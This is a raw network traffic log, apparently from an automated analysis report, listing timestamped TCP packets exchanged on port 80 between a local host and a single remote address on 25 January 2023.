Jan 25, 2023 09:28:12.781889915 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.781944036 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.781944990 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782008886 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782071114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782124043 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.782134056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782186985 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.782202005 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782264948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782325029 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782375097 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.782383919 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782439947 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.782448053 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782515049 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782577991 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782628059 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.782639027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782687902 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.782753944 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782819033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782880068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782933950 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.782941103 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.782990932 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.783003092 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783070087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783133030 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783185959 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.783195972 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783267021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783320904 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.783333063 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783384085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.783395052 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783456087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783514977 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783561945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783570051 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.783617973 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.783662081 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783720016 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783782005 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783832073 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.783840895 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783890963 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.783902884 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.783963919 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784020901 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784073114 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.784080982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784143925 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784193039 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.784213066 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784264088 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.784274101 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784336090 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784396887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784454107 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.784456968 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784506083 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.784519911 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784581900 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784640074 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784650087 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.784703016 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784765959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784816980 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.784825087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784872055 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.784885883 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.784949064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785010099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785068035 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.785072088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785123110 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.785132885 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785197973 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785258055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785314083 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.785319090 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785381079 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785387039 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.785442114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785504103 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785558939 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.785563946 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785612106 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.785625935 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785686970 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785746098 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785804987 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785811901 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.785855055 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.785865068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785928965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.785989046 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.786041975 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.786047935 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.786103964 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.786108971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.786176920 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.786237001 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.786297083 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.786304951 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.786350965 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.786359072 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.786679029 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.786782026 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.786844969 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.786860943 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.786897898 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.786902905 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.786971092 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787033081 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787094116 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787125111 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.787144899 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.787157059 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787224054 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787286043 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787348032 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.787353039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787405014 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.787417889 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787477970 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787539959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787597895 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.787601948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787653923 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.787663937 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787727118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787789106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787839890 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787847996 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.787899017 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.787905931 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.787969112 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788032055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788088083 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.788093090 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788149118 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.788153887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788218975 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788280010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788335085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.788338900 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788389921 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.788400888 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788463116 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788523912 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788584948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788585901 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.788636923 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.788647890 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788711071 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788773060 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788829088 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.788830042 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788888931 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.788897038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.788959980 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.789024115 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.789084911 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.789088964 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.789140940 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.789150000 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.789206982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.789596081 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.789657116 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.789669037 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.789712906 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.789717913 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.789783001 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.789843082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.789905071 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.789907932 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.789958954 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.789963007 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790026903 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790086985 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790143013 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.790143967 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790196896 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.790210962 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790265083 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790330887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790391922 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790400982 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.790452957 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790493011 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.790507078 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790572882 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790632010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790633917 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.790684938 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.790714979 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790785074 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790846109 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790906906 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.790908098 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.790963888 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.790968895 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791029930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791090012 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791146040 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.791151047 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791212082 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.791215897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791277885 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791340113 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791399002 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.791399956 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791464090 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791470051 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.791524887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791584015 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791637897 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.791646004 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791699886 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.791708946 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791770935 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791831017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791887999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.791888952 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.791997910 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.830229044 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.830291986 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.830358982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.830421925 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.830449104 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.830486059 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.830545902 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.830549002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.830605984 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.830611944 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.830674887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.830770969 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.830832958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.830836058 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.830893993 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.830897093 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.830955982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831017971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831079960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831080914 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.831136942 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.831139088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831207037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831268072 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831329107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831343889 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.831401110 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.831407070 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831471920 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831532001 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831587076 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.831593037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831656933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831657887 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.831718922 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831780910 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831834078 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831892967 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.831892967 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.831897974 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831952095 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.831985950 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832031965 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.832051039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832113981 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832175970 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832181931 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.832236052 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.832241058 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832304001 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832366943 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832429886 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832432985 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.832487106 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.832493067 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832555056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832614899 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832676888 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832684994 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.832734108 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.832741022 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832804918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832868099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832931042 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.832931995 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.832992077 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833049059 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.833055019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833126068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833194971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833198071 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.833256006 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.833265066 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833333969 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833403111 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833466053 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833528996 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833528996 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.833528996 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.833600044 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833667040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833676100 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.833730936 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833796024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833857059 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833923101 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.833940029 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.833969116 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.833987951 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834048033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834059000 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.834114075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834177971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834242105 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834249020 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.834296942 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834321022 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.834361076 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834424019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834480047 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.834485054 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834537029 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.834547043 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834609985 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834672928 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834750891 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.834762096 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834822893 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834876060 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.834889889 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.834944010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835004091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835006952 CET	49736	80	192.168.2.4	188.114.96.3
